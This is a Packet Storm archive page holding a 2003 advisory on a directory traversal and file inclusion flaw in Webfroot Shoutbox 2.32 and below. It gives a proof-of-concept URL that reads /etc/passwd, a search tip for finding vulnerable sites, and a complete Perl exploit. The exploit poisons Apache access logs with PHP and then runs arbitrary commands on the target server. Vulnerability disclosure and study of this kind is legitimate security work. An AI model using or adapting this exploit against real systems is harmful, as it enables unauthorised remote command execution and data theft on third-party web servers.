what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

shoutbox.txt

shoutbox.txt
Posted May 29, 2003
Authored by Pokleyzz | Site scan-associates.net

Webfroot Shoutbox v2.32 and below suffers from a directory traversal and code injection vulnerability that allows a remote attacker to view any file on the system and the ability to commit remote command execution.

tags | exploit, remote
SHA-256 | 96dae25093b042b892ea5293b33240d84967d48cd1aef6c7743870e4dd15cf1e

shoutbox.txt

Change Mirror Download
Products: Webfroot Shoutbox v 2.32 and below (https://shoutbox.sf.net)
Date: 09 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: https://www.scan-associates.net

Summary: Webfroot Shoutbox 2.32 and below directory traversal and code injection.

Description
===========
Webfroot Shoutbox is PHP script released under the GPL. Also known as a tagboard
or a blabbox, shoutboxes allow visitors to your website to leave messages to
other visitors quickly and easily.

Details
=======
User can view any readable file on system where webfroot shoutbox is running using
$conf variable.

i) Shoutbox v2.32

shoutbox.php line 43
-------------------------------------------------------------------
if (!isset($conf)) {
$conf="shoutboxconf.php";
} else {
# michel v was there
$conf = str_replace(':', '', $conf); // hi cross-site scripting, bye cross-site scripting
$conf = str_replace('%3a', '', $conf); // hi cross-site scripting, bye cross-site scripting
}

require_once ($conf);
-------------------------------------------------------------------

ii) Shoutbox v2.31

shoutbox.php line 43
-------------------------------------------------------------------
if (!isset($conf)) {
$conf="shoutboxconf.php";
}

require_once ($conf);
--------------------------------------------------------------------

Proof of concept
================

a) View any readable file
https://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd

b) Remote command execution
i) for version 2.31 user can remotely include file.
ii) version 2.32 user can use apache access_log to include php code
[see attachment]


Workaround
==========
Append to line 48 of shoutbox.php
$conf = str_replace('./', '', $conf); // to avoid directory traversal


Tips
====
Search for ":: Shoutbox" at www.google.com can easily identify vulnerable site (129,000 result)



--- start jeritan_batinku.pl PoC exploit ---



#!/usr/bin/perl
#
# Webfroot Shoutbox < 2.32 on apache exploit
# by pokleyzz of d'scan clanz
#
# Greet:
# tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, tenukboncit, kerengge_kurus ,
# s0cket370 , b0iler and d'scan clan.
#
# Shout to:
# #vuln , #mybsd , #mylinux
#
# Just for fun :). Weekend stuff ..
#

use IO::Socket;

my $host = "127.0.0.1";
my $port = 80;
my $shoutbox = "shoutbox.php?conf=";
my $shoutboxpath = "/shoutbox";
my $cmd = "ls -l";
my $conn;
my $type;
my @logs = (
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/apache/access_log",
"/var/log/apache/access.log",
"/var/log/httpd/access_log",
"/var/log/httpd/access.log",
#"D:/apps/Apache Group/Apache2/logs/access.log"
);

my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?></pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n";
my $conn;


if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
$type = $ARGV[0];
}
else {
print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\tby pokleyzz of d' scan clan\n\n";
print "Usage: \n jeritan_batinku.pl (x|r) host [command] [path] [port]\n";
print "\ttype\tx = exploit | r = run command (after run with x option)\n";
print "\thost\thostname\n";
print "\tcommand\tcommand to execute on remote server\n";
print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
print "\tport\tport number\n";
exit;
}

if ($ARGV[1]){
$host = $ARGV[1];
}

if ($ARGV[2]){
$cmd = $ARGV[2];
}
if ($ARGV[3]){
$shoutboxpath = $ARGV[3];
}
if ($ARGV[4]){
$port = int($ARGV[4]);
}

$cmd =~ s/ /+/g;

sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}

sub connect_end {
#print "[x] Close connection\n";
close($conn);
}

sub exploit {
my $access_log = $_[0];
my $result = "";
$access_log =~ s/ /+/g;
my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\nHost: $host\nConnection: Close\n\n";
print "$query";
print "[x] Access log : ", $access_log ,"\n";
&connect_to;
print $conn $query;
while ($line = <$conn>) {
$result = $line;
#print $result;
};
&connect_end;

}

sub run_cmd {
my $conf="/tmp/.ex";
#my $conf="d:/tmp/.ex";
my $result = "";
my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\nHost: $host\nConnection: Close\n\n";

print "[x] Run command ...\n";
&connect_to;
print $conn $query;
while ($line = <$conn>) {
$result .= $line;
};
&connect_end;
if ($result =~ /Result:/){
print $result;
} else {
print $result;
print "[*] Failed ...";
}

}

sub insert_code {
my $result = "";
print "[x] Access log : ", $access_log ,"\n";
print "[x] Insert php code into apache access log ...\n";
&connect_to;
print $conn "$qinit";
while ($line = <$conn>) {
$result .= $line;
};
&connect_end;
print $result;
}

if ($type eq "x"){
&insert_code;
print "[x] Trying to exploit ...\n";
for ($i = 0;$i <= $#logs; $i++){
&exploit($logs[$i]);
}
&run_cmd;
} else {
&run_cmd;
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close